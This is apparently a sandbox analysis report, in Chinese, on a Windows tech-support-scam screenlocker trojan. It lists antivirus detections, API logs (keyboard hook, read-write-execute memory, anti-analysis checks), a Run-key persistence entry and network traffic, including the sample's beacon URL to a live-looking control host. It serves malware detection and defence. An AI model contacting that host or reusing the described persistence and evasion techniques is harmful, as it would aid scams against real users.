9.0
极危
49 个模型检测该样本为恶意!
重新分析
更多

377096fe03972ed7b661a7822969a5db0407902dddec756b30d2fa09547e194f

4c385e2bea8f5d1fae0c8629413c3f4b.exe

分析耗时

128s

最近分析

文件大小

64.8KB
静态报毒 动态报毒 100% AI SCORE=100 ARTEMIS CLASSIC CONFIDENCE EM1@AQV19TB FAKEALERT FAKESUPPORT FAKESUPPORTSCAM HIGH CONFIDENCE KCLOUD MALCERT MALICIOUS PE MALWARE@#2G356V2NP40JS PDMM QUCH RBPFO SAVE SCORE SCREENLOCK STATIC AI SUSGEN TECHSUPPORTSCAM UNSAFE ZEMSILF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Artemis!4C385E2BEA8F 20210222 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20210203 1.0
Alibaba Trojan:MSIL/FakeSupport.5d9dbb0c 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20210222 21.1.5827.0
Kingsoft Win32.Troj.Undef.(kcloud) 20210222 2017.9.26.565
Tencent Msil.Trojan.Fakesupport.Pdmm 20210222 1.0.0.1
静态指标
Queries for the computername (50 out of 67 个事件)
Time & API Arguments Status Return Repeated
1619522247.62525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522250.32825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522260.03225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522261.48525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522262.71925
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522263.95325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522265.18825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522266.40725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522267.64125
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522268.87525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522270.11025
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522271.34425
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522272.57825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522273.81325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522275.04725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522276.28225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522277.51625
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522278.75025
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522279.98525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522281.21925
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522282.45325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522283.68825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522284.92225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522286.15725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522287.39125
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522288.62525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522289.86025
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522291.09425
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522292.32825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522293.56325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522294.79725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522296.03225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522297.26625
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522298.50025
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522299.73525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522300.96925
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522302.20325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522303.43825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522304.67225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522305.90725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522307.14125
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522308.37525
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522309.61025
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522310.84425
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522312.07825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522313.31325
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522314.54725
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522315.78225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522317.03225
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619522318.26625
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (2 个事件)
Time & API Arguments Status Return Repeated
1619522241.70325
IsDebuggerPresent
failed 0 0
1619522241.70325
IsDebuggerPresent
failed 0 0
This executable is signed
This executable has a PDB path (1 个事件)
pdb_path C:\Back up\backup\final source code\Pop Server\Win Act compatible\Win Act\Win Act\obj\Release\Win Act.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619522241.71925
GlobalMemoryStatusEx
success 1 0
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features GET method with no useragent header suspicious_request GET http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Performs some HTTP requests (5 个事件)
request GET http://themediafox.com/hipop2/locker/api/info?h=VB4d3bbc8a-fd72b187&c=OSKAR-PC&w=0
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Sends data using the HTTP POST Method (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:4191545013&cup2hreq=c2401fc69b176bc59651af6d3e1f63b0387db022b0de83c4e2d7843aedd48b39
Allocates read-write-execute memory (usually to unpack itself) (50 out of 84 个事件)
Time & API Arguments Status Return Repeated
1619522240.42225
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x00420000
success 0 0
1619522240.42225
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00480000
success 0 0
1619522241.59425
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x020b0000
success 0 0
1619522241.59425
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02280000
success 0 0
1619522241.64125
NtProtectVirtualMemory
process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73b91000
success 0 0
1619522241.70325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x00ae0000
success 0 0
1619522241.70325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c40000
success 0 0
1619522241.70325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0044a000
success 0 0
1619522241.70325
NtProtectVirtualMemory
process_identifier: 2536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73b92000
success 0 0
1619522241.70325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00442000
success 0 0
1619522242.14125
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00452000
success 0 0
1619522242.25025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00475000
success 0 0
1619522242.25025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0047b000
success 0 0
1619522242.25025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00477000
success 0 0
1619522242.50025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00453000
success 0 0
1619522242.62525
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00454000
success 0 0
1619522242.65725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00455000
success 0 0
1619522242.65725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0045c000
success 0 0
1619522243.32825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00456000
success 0 0
1619522243.34425
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00458000
success 0 0
1619522243.50025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b00000
success 0 0
1619522243.65725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0046a000
success 0 0
1619522243.65725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00467000
success 0 0
1619522243.81325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00459000
success 0 0
1619522243.82825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c30000
success 0 0
1619522243.92225
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00466000
success 0 0
1619522244.06325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c31000
success 0 0
1619522244.12525
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b01000
success 0 0
1619522244.14125
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c32000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
base_address: 0xfff40000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0xfff40000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0xfff40000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0xfff48000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
base_address: 0xfff30000
success 0 0
1619522244.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0xfff30000
success 0 0
1619522244.18825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c33000
success 0 0
1619522244.18825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0045d000
success 0 0
1619522244.34425
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b02000
success 0 0
1619522244.36025
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b04000
success 0 0
1619522244.84425
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0045a000
success 0 0
1619522245.14125
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c34000
success 0 0
1619522245.14125
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c35000
success 0 0
1619522245.15725
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c36000
success 0 0
1619522245.17225
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c37000
success 0 0
1619522247.32825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b05000
success 0 0
1619522247.32825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c38000
success 0 0
1619522247.32825
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0045e000
success 0 0
1619522247.37525
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b06000
success 0 0
1619522247.39125
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00c39000
success 0 0
1619522247.45325
NtAllocateVirtualMemory
process_identifier: 2536
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00b07000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619522252.92225
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1619522244.23525
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Looks for the Windows Idle Time to determine the uptime (1 个事件)
Time & API Arguments Status Return Repeated
1619522251.42225
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
A process attempted to delay the analysis task. (1 个事件)
description 4c385e2bea8f5d1fae0c8629413c3f4b.exe tried to sleep 761157943 seconds, actually delayed analysis time by 761157943 seconds
Installs itself for autorun at Windows startup (1 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win Act reg_value C:\Users\Administrator.Oskar-PC\AppData\Roaming\Win_Act\Win Act\1.0.0.0\4c385e2bea8f5d1fae0c8629413c3f4b.exe
Creates a windows hook that monitors keyboard input (keylogger) (1 个事件)
Time & API Arguments Status Return Repeated
1619522244.23525
SetWindowsHookExW
thread_identifier: 0
callback_function: 0x02280d02
module_address: 0x00c90000
hook_identifier: 13 (WH_KEYBOARD_LL)
success 1114517 0
File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Generic.Malware.SLc.06803CAE
McAfee Artemis!4C385E2BEA8F
Cylance Unsafe
Zillya Trojan.FakeSupport.Win32.182
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:MSIL/FakeSupport.5d9dbb0c
K7GW Trojan ( 005695e91 )
K7AntiVirus Trojan ( 005695e91 )
Arcabit Generic.Malware.SLc.D1A93CAE
Cyren W32/Trojan.QUCH-9319
Symantec Trojan.Gen.MBT
Avast Win32:Trojan-gen
Kaspersky HEUR:Trojan.MSIL.FakeSupport.gen
BitDefender Generic.Malware.SLc.06803CAE
Paloalto generic.ml
Rising Trojan.MSIL.KeyLogger!1.647D (CLASSIC)
Ad-Aware Generic.Malware.SLc.06803CAE
Sophos Mal/Generic-S
Comodo Malware@#2g356v2np40js
F-Secure Trojan.TR/FakeSupport.rbpfo
DrWeb Trojan.Fakealert.59222
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.Malware.SLc.06803CAE
Emsisoft MalCert-S.CA (A)
SentinelOne Static AI - Malicious PE
eGambit Generic.Malware
Avira TR/FakeSupport.rbpfo
MAX malware (ai score=100)
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.Agent.oa
Microsoft Trojan:MSIL/ScreenLock.MB!MTB
ZoneAlarm HEUR:Trojan.MSIL.FakeSupport.gen
GData Generic.Malware.SLc.06803CAE
Cynet Malicious (score: 85)
BitDefenderTheta Gen:NN.ZemsilF.34574.em1@aqv19Tb
ALYac Trojan.Ransom.TechSupportScam
Malwarebytes Trojan.FakeSupport
ESET-NOD32 a variant of MSIL/FakeSupport.DS
Tencent Msil.Trojan.Fakesupport.Pdmm
Ikarus Trojan.MSIL.FakeSupportScam
MaxSecure Trojan.Malware.9000873.susgen
Fortinet MSIL/FakeSupport.DS!tr
Webroot W32.Trojan.Gen
AVG Win32:Trojan-gen
Cybereason malicious.bea8f5
Qihoo-360 Generic/Trojan.604
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.160.78:443
dead_host 172.217.24.14:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-06-11 07:03:40

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49189 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49190 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49188 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49187 203.208.41.98 update.googleapis.com 443
192.168.56.101 49181 208.109.25.159 themediafox.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53380 114.114.114.114 53
192.168.56.101 53500 114.114.114.114 53
192.168.56.101 54991 114.114.114.114 53
192.168.56.101 55169 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60911 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=1bfb462cfdd3e97b&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619493142&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
